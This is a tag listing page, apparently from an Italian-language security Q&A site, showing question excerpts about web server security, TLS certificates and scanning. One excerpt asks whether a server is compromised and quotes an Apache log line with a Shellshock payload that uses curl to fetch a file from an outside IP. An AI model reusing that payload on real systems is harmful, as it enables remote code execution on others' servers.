Domande con tag 'webserver'

domande con tag
1
risposta

Richiesta strana al server Web NodeJS

Quindi, registrando tutte le richieste ottengo cose del genere: Lun Sep 07 2015 21:30:04 GMT + 0200 (CEST) Richiesta ricevuta per collegamento anche per link Il mio server semplice: var server = http.createServer(function(request,...
posta 07.09.2015 - 22:53
2
risposte

Quale algoritmo dovrei usare per evitare l'errore "ERR_SSL_WEAK_SERVER_EPHEMERAL_DH_KEY"?

Ho ricevuto un certificato CA presentando il mio CSR da GoDaddy, dopo aver applicato un certificato al mio server Web Tomcat. Quando accedo al mio sito web utilizzando Chrome o Mozilla, ho riscontrato l'errore: ERR_SSL_WEAK_SERVER_EPHEMERAL...
posta 17.09.2015 - 07:10
1
risposta

Sicurezza Javascript di dominio incrociato [duplicato]

Ho usato uno scanner di vulnerabilità web per analizzare il mio sito web. Indica diversi collegamenti con "Inclusione di file di origine script Java di dominio incrociato". Posso sapere come potrebbe un aggressore sfruttare questo tipo di v...
posta 04.03.2015 - 11:48
2
risposte

Pinning e sottodomini a chiave pubblica

In breve, ho intenzione di installare un nuovo server web e mi piacerebbe proteggere gli utenti un po 'di più. Ho già dominio, (virtuale) server e tutto il resto che conta quando si configura un server. In pratica, questo verrà utilizzato come s...
posta 01.09.2015 - 22:04
3
risposte

Oltre le iniezioni SQL e XSS

Sono un programmatore che lavora su un servizio web (da solo). Dato che non sono un esperto di sicurezza, sono venuto in questo sito per porre la mia domanda. Ho fatto tutto il necessario per proteggere il mio sito web. Ho provato a protegger...
posta 22.12.2014 - 23:23
1
risposta

I binari del server collegati in modo statico (demoni) dovrebbero essere considerati più sicuri? [chiuso]

Per molto tempo ho riflettuto su questa domanda. Sono a conoscenza dei vantaggi e degli svantaggi delle librerie dinamiche (oggetti condivisi), incluso infame articolo di Drepper . A parità di altre condizioni, non si tratta di un binario co...
posta 30.05.2014 - 20:42
1
risposta

Come fa un browser a scegliere quale certificato utilizzare se il mio server web ha più certificati?

Sto utilizzando Apache 2.4, con due certificati, un RSA firmato da CACert e un ECC autofirmato. Nessuno di questi certificati fornisce un percorso per un certificato radice trusted-broswer. La mia domanda è questa: quando viene presentato con...
posta 18.11.2014 - 15:18
2
risposte

È illegale usare falsi User-agent? [chiuso]

È illegale impersonare agenti utente durante la scansione di un sito Web? In caso affermativo, cosa e come un'azione legale può essere intrapresa contro il richiedente falso? Questa legge si applica solo ai crawler o a un utente che imperson...
posta 26.09.2013 - 11:32
1
risposta

I registri di Apache mostrano l'esecuzione dei comandi

Mi chiedo se il mio server è compromesso o meno. Ho appena guardato il mio log e ho visto la seguente riga: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/u...
posta 28.12.2017 - 20:24
2
risposte

Il modo più efficace per eseguire la scansione dei server Web

Diciamo che voglio scansionare una grande quantità di indirizzi IP per i server web in esecuzione sulla porta 80 (consapevole che ci sono altre porte per i server web, ignorando ad esempio). Quale sarebbe il modo più efficiente per farlo?...
posta 07.01.2018 - 20:00